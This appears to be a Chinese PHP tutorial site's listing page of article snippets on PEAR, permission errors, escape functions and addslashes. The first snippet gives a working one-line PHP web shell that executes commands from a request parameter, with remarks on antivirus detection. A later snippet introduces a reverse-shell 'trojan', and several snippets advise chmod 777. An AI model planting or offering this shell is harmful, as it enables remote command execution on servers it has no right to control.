-
php一句话cmdshell新型 (非一句话木马)
本文为大家讲解了一个新的一句话木马写法:"`"(键盘上~符号的下档键),和python中一样,这个符号中的命令会被php解析器执行,感兴趣的同学参考下. php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型); <?php /*一个新型的php一句话cmdshell(非一句话木马) //原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型); //局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码; //write by skyfire */ echo `$_REQUEST[id]`; ?> ...
PHP 2014-12-13 05:27:08 -
PHP Pear 安装及使用
本文为大家讲解的是php pear的方装和使用方法,感兴趣的同学参考学习下. PEAR是PHP扩展与应用库(the PHP Extension and Application Repository)的缩写。它是一个PHP扩展及应用的一个代码仓库,简单地说,PEAR之于PHP就像是CPAN(Comprehensive Perl Archive Network)之于Perl...
PHP 2014-12-13 03:48:03 -
php错误: file_put_contents(xxxx) [function.file-put-contents]: failed to open stream: Permission denied in原因及解决方法
PHP 错误: file_put_contents(xxxx) [function.file-put-contents]: failed to open stream: Permission denied in 原因: file_put_contents函数在向指定文件写入数据时权限不足写入失败 解决方法: 修改被写入的文件权限,如果是自动创建的文件,则目录没有权限,需要把目录赋予可写权限 linux下 chmod -R 777 ...
PHP 2014-12-13 03:42:03 -
PHP Warning: include() [function.include]: Failed opening '/xxxx.php' for inclusion (include_path='.:/xxx/xxx/php/lib/php') in xxx.php解决方法
PHP 提示错误: include() [function.include]: Failed opening '/xxxx...
PHP 2014-12-13 03:33:04 -
PHP Warning: mkdir() [function.mkdir]: Permission denied in解决方法
php在调用用mkdir时出错PHP Warning: mkdir() [function.mkdir]: Permission denied in 原因: 权限不足不能执行创建目录命令 解决方法: 修改父级目录权限为0777即可 linux: chmod -R 777 ...
PHP 2014-12-13 02:45:05 -
PHP Warning: include(xxx.php) [function.include]: failed to open stream: Permission denied in原因及解决方法
php提示错误:PHP Warning: include(xxx.php) [function...
PHP 2014-12-13 02:30:06 -
php escape URL编码函数
本文是一个php实现的url 编码函数,既:php版的escape/unescape函数,感兴趣的同学参考下. php提供的URL编码函数是基于字节的,对由ie的javascript函数escape编码的数据就无能为力了。 function escape($str) { preg_match_all("/[x80-xff].|[x01-x7f]+/",$str,$r); $ar = $r[0]; foreach($ar as $k=>$v) { if(ord($v[0]) < 128) $ar[$k] = rawurlencode($v); else $ar[$k] = "%u".bin2hex(iconv("GB2312","UCS-2",$v)); } return join("",$ar); } function unescape($str) { $str = rawurldecode($str); preg_match_all...
PHP 2014-12-13 00:45:15 -
-
php 什么是PEAR?(第二篇)
什么是PEAR?(第二篇) 第三章 ▉ 3-1 PEAR套件(Package)的资讯 ▓ 套件简介 PEAR最重要的就是拥有许多的程式库可供开发者免费引用,这些程式库会被包裹成套件,而且每个套件中都会放入一个名为package.xml的档案.这是PEAR团队的规定,这个档案纪錄著程式库的档案架构,版本编号等资料,有了这个档案,程式库压缩后才有资格称为「套件」,也因为有了这个xml档,PEAR所提供的「套件管理指令」就可以很简单地管理程式库,例如:可以用指令来安装套件、刪除套件、观看套件资讯或套件升级等。 另外.关於套件的安全性方面,使用者若发现套件有问题,可以借由论坛加以讨论或回报给开发团队,他们就会快速的进行修正与改版,也因此每个套件都会有版本编号加以区分改版的过程...
PHP 2014-12-12 20:39:13 -
php addslashes 函数使用说明
本文为大家讲解了php下的addslashes函数的使用方法,及用处,感兴趣的同学参考下. addslashes (PHP 3, PHP 4, PHP 5) addslashes -- 使用反斜线引用字符串 描述 string addslashes ( string str ) 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)...
PHP 2014-12-12 15:00:14 -
php反弹shell实现代码(反弹木马)
本文为大家讲解了一个php实现的反弹shell的示例代码(反弹木马),并简单讲解了他的原理,感兴趣的同学研究学习下. 遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。 非常无 奈,没想 到什么好的办法,后来灵光一闪...
PHP 2014-12-12 12:06:13 -
php 什么是PEAR?(第三篇)
什么是PEAR?(第三篇) ▓ PEAR套件的管理 安装完基本套件后,当开发者需要使用基本套件以外的其他套件时,会需要安装套件,若不需要某个套件时,就会想要移除套件,若套件版本过於老旧,则需要升级套件,也就是說开发者需要一套PEAR套件的管理系统。 在Windows作业系统下的套件安装与管理可以有两种方式,一种是使用Web的管理介面,另一种足使用「套件指令」...
PHP 2014-12-12 08:48:07
